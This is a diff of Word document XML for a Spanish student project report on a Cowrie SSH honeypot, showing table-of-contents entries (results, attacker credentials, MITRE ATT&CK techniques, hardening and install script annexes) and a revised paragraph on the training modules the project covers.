+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	51</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pruebas Pendientes en el Servidor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	54</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Resultados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	55</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Volumen de la Actividad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	55</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Naturaleza Automatizada de los Ataques</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	55</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Origen Geográfico</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	56</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Credenciales</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	57</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Campañas Identificadas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	58</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	59</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Primeras Conclusiones Defensivas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	61</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Trabajos Futuros</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	62</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	62</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mejora del Análisis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	62</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Integración y Automatización</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	63</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	65</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Valoración Personal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	66</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Referencias</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	67</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	69</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo A. Configuración de Cowrie (cowrie.cfg)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	69</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo B. Credenciales del Honeypot (userdb.txt)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	71</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo C. Configuración del SSH de Administración</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	72</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo D. Servicio de systemd de Cowrie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	73</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo E. Reserva de Memoria (oci-keepalive)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	74</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo F. Script de Bastionado (01_hardening.sh)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	76</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo G. Script de Instalación de Cowrie (02_instalar_cowrie.sh)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	79</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Anexo H. Script de Redirección (03_redireccion_22.sh)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	82</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -945,7 +3347,1038 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Desde una perspectiva formativa, el proyecto integra competencias de múltiples módulos del ciclo de ASIR: administración de sistemas operativos (Linux), servicios de red e Internet (SSH, firewall), seguridad y alta disponibilidad (hardening, detección de intrusiones), lenguajes de marca y scripting (Python, JSON) e implantación de aplicaciones web (despliegue cloud). Esta transversalidad lo convierte en un proyecto idóneo como Trabajo de Fin de Ciclo.</w:t>
+        <w:t xml:space="preserve">Desde una perspectiva formativa, el proyecto integra competencias de la mayoría de los módulos del ciclo, como se detalla en el apartado siguiente. Esta transversalidad lo convierte en un proyecto idóneo como Proyecto Intermodular.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Relación con los Módulos Profesionales</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
